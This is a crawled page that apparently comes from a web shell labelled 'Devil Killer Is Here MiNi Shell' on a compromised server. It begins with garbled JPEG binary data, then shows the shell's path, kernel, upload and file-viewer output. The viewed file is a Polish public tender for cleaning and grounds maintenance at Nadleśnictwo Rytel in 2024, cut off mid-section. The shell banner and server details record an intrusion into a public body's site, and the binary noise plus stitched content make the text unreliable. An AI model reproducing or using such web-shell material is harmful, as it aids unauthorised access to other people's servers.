JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231213/0055083301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie prac porządkowych, utrzymania zieleni i innych prac gospodarczych wykonywanych w budynkach i przy siedzibie Nadleśnictwa Rytel w roku 2024. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa PGL Lasy Państwowe Nadleśnictwo Rytel</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090550740</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rytel-Dworzec 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rytel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-642</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 334 18 50</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 334 18 51</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rytel@torun.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rytel.torun.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie prac porządkowych, utrzymania zieleni i innych prac gospodarczych wykonywanych w budynkach i przy siedzibie Nadleśnictwa Rytel w roku 2024. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f9d55e8b-9999-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00550833</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00519048/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Obsługa gospodarcza siedziby Nadleśnictwa w 2024 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_rytel/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_rytel/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej<br/>(elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy<br/>https://platformazakupowa.pl/ , stanowiącym załącznik nr 11 do SWZ. Wykonawca,<br/>przystępując do niniejszego postępowania o udzielenie zamówienia, akceptuje te wymagania<br/>oraz warunki korzystania z ww. platformy.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy<br/>https://platformazakupowa.pl/ wynosi w przypadku komunikacji niezaszyfrowanej 500 MB,<br/>dla komunikacji szyfrowanej 300 MB. Maksymalna wielkość oznacza całkowitą objętość danych<br/>wykonawcy w ramach prowadzonej operacji.<br/>Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie<br/>https://platformazakupowa.pl/ . Za datę przekazania wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej<br/>(elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz innych<br/>informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej Zamawiającego<br/>wskazany w pkt 9.9 lit b) SWZ lub złożenia na platformie https://platformazakupowa.pl//.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający<br/>informuje, iż administratorem danych osobowych jest CompNet Sp. z o. o. Administrator<br/>wyznaczył Inspektora Ochrony Danych Osobowych p. Patryka Makowskiego z którym<br/>w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za<br/>pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl lub telefonicznie<br/>pod numerem 796 400 977.<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o<br/>udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich<br/>bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX<br/>PZP, do upływu terminu do ich wniesienia.<br/>20.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do<br/>przetwarzania takich danych są obowiązane do zachowania ich w poufności Dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz<br/>jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art.<br/>255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej<br/>realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego<br/>archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o przepisy.Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.Niezależnie od postanowień pkt 20.7. powyżej, w przypadku zawarcia umowy w<br/>sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu<br/>przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>20.9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi<br/>doradcze, w tym usługi prawne, i konsultingowe.Więcej informacji znajduje się w pkt 20 SWZ,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w<br/>art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt,<br/>że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>20.14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów<br/>państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub<br/>wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec<br/>Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w<br/>imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.2.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac porządkowych w budynkach o łącznej powierzchni około 1000 m2 przewiduje:<br/>- sprzątanie podłóg i posadzek, paneli, odkurzanie, mycie– codziennie;<br/>- opróżnianie koszy na śmieci, czyszczenie ubikacji, pisuarów, zlewów i zlewozmywaków, , uzupełnianie papieru toaletowego, mydła, kostek toaletowych, odświeżaczy, ręczników jednorazowych – codziennie;<br/>- czyszczenie parapetów, biurek, stołów, stolików, szaf itp, - codziennie;<br/>- mycie naczyń i ułożenie naczyń po zakończeniu pracy pracowników - codziennie<br/>- mycie naczyń po naradach i sesjach, pranie obrusów - wg potrzeb;<br/>- podlewanie i pielęgnowanie kwiatów znajdujących się w biurze wg potrzeb<br/>- mycie drzwi zewnętrznych i wewnętrznych ( w tym drzwi szklane) balustrad oraz poręczy, utrzymując je w czystości ( raz w tygodniu, w razie potrzeb częściej),<br/>- mycie glazury, luster, armatury sanitarnej, płytek ściennych – raz w tygodniu;<br/>- gruntowne sprzątanie pomieszczeń kuchennych łącznie z czyszczeniem sprzętu AGD – raz w tygodniu;<br/>- odkurzanie sprzętu biurowego jaki znajduje się na wyposażeniu poszczególnych biur – raz w tygodniu;<br/>- wiosenne i jesienne mycie okien (łącznie z futrynami i parapetami),<br/>- czyszczenie żaluzji drewnianych – raz w tygodniu,<br/>- dbanie o ekspresy do kawy, czyszczenie – codziennie<br/>- przygotowanie pokoi gościnnych, pranie pościeli i ręczników w miarę potrzeb<br/>2. Dodatkowe ustalenia:<br/>- Zleceniobiorca zapewnia środki czystości w postaci płynów do mycia, proszków, past, kostek WC oraz sprzęt potrzebny do sprzątania.<br/>- Zleceniodawca zakupuje we własnym zakresie środki czystości takie jak: papier toaletowy, ręczniki papierowe, mydło w płynie oraz worki foliowe.<br/>3. Utrzymanie terenów zielonych<br/>Koszenie trawników, napowietrzanie aeratorem, formowanie żywopłotów i krzewów, pielenie rabat, sadzenie drzew i krzewów oraz kwiatów, pielęgnowanie, nawożenie, wykonanie oprysków ochronnych między innymi na mszyce i grzyby, podlewanie wszystkich roślin wokół siedziby nadleśnictwa, okrywanie na zimę roślin tego wymagających, wykopywanie roślin niezimujących). Obsługa fontanny, utrzymanie sprawności fontanny w okresie letnim łącznie z wymianą wody w razie konieczności, wypompowanie wody i zabezpieczenie jej na okres zimowy. Utrzymanie w należytym stanie parku przy siedzibie nadleśnictwa. Usuwanie chwastów z rabat kwiatowych.<br/>Wykonywanie wszystkich czynności zgodnie z kalendarzem ogrodniczym i sztuką ogrodniczą. Sprzęt, paliwo, środki do pielęgnowania zapewnia nadleśnictwo.<br/>4. Inne prace gospodarcze<br/>Utrzymanie czystości w obejściu siedziby nadleśnictwa, konserwacja płotów i pergoli, prace porządkowe w magazynach, warsztatach i innych pomieszczeniach, odśnieżanie i utrzymanie obejścia w okresie zimowym poprzez posypywanie chodników i miejsc parkingowych mieszanką solno-piaskową, , konserwacja okien, czyszczenie rynien na budynkach, pomoc przy załadunku i rozładunku dostaw, naprawa i konserwacja ogrodzenia wokół siedziby, wykonanie drobnych prac murarskich, malarskich i rozbiórkowych. Innych prac zleconych wynikających z bieżącej potrzeby w zakresie prawidłowego funkcjonowania biura nadleśnictwa jak i dbałości o otoczenie. Posiadanie uprawnień na pilarkę spalinową. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90911200-8 - Usługi sprzątania budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90919200-4 - Usługi sprzątania biur</p> <p class="mb-0">90911000-6 - Usługi sprzątania/czyszczenia miejsc noclegowych, budynków i okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający będzie się kierował następującym kryterium oceny<br/>	ofert:<br/> Cena – 100 %<br/>	W Opisie Przedmiotu Zamówienia (stanowiącym załącznik nr 3 do SWZ) określono wymagania jakościowe głównych elementów składających się na przedmiot zamówienia.<br/>Sposób obliczania punktów:<br/><br/><br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/> Cn<br/>C = ------------ x 100 pkt<br/> Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/><br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie (stanowiącej załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/> Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą liczbę punktów. Oferta może uzyskać maksymalnie 100 punktów.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie lub koszcie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.<br/> Zamawiający informuje równocześnie wszystkich Wykonawców, którzy w odpowiedzi na ogłoszenie o zamówieniu złożyli oferty, o Wykonawcach:<br/>	1) których oferty nie zostały odrzucone oraz punktacji przyznanej ofertom w każdym kryterium oceny ofert i łącznej punktacji,<br/>	2) których oferty zostały odrzucone.<br/><br/>Zamawiający świadomie stosuje art. 246 ust. 2 pzp, wskazując, iż w pkt 3 SWZ oraz załączniku nr 3 do SWZ są wskazane standardy jakościowe pozwalające stosować cenę 100% jako jedyne kryterium wyboru ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym Zamawiający nie formułuje<br/>warunku udziału w postępowaniu w odniesieniu do występowania w obrocie<br/>gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do<br/>warunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku<br/>udziału w postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca<br/>wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż:<br/>10 000,00 zł (słownie złotych: dziesięć tysięcy 00/100)<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował<br/>lub realizuje (przy czym w tym przypadku będzie liczona wartość zrealizowanej części<br/>przedmiotu umowy) co najmniej 1 usługę (przez usługę rozumie się wykonywanie prac<br/>na podstawie 1 umowy) polegającą na utrzymania czystości na terenie świadczonych<br/>przez niego usług oraz utrzymywania terenów zielonych, a także dokonywania<br/>konserwacji i drobnych napraw na kwotę nie mniejszą niż 100 000,00 zł brutto;<br/>b) W zakresie potencjału technicznego:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego<br/>warunku udziału w postępowaniu.<br/>7.2. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z<br/>formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 8. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa<br/>w pkt 6.1. i 6.3. i 6.4 oraz w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, o których mowa w pkt 7.1. SWZ Wykonawca składa wraz z ofertą<br/>oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. wstępne oświadczenie o<br/>spełnianiu warunków udziału (sporządzone zgodnie ze wzorem stanowiącym załącznik<br/>nr 5, 5C do SWZ) oraz oświadczenie o braku podstaw do wykluczenia<br/>(sporządzone zgodne ze wzorem stanowiącym załącznik nr 4 do SWZ).<br/>W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1.<br/>Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP<br/>wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia<br/>następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku<br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2023 r. poz. 1689 z<br/>późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej - (sporządzone zgodne ze wzorem stanowiącym załącznik nr 7 do<br/>SWZ);<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz 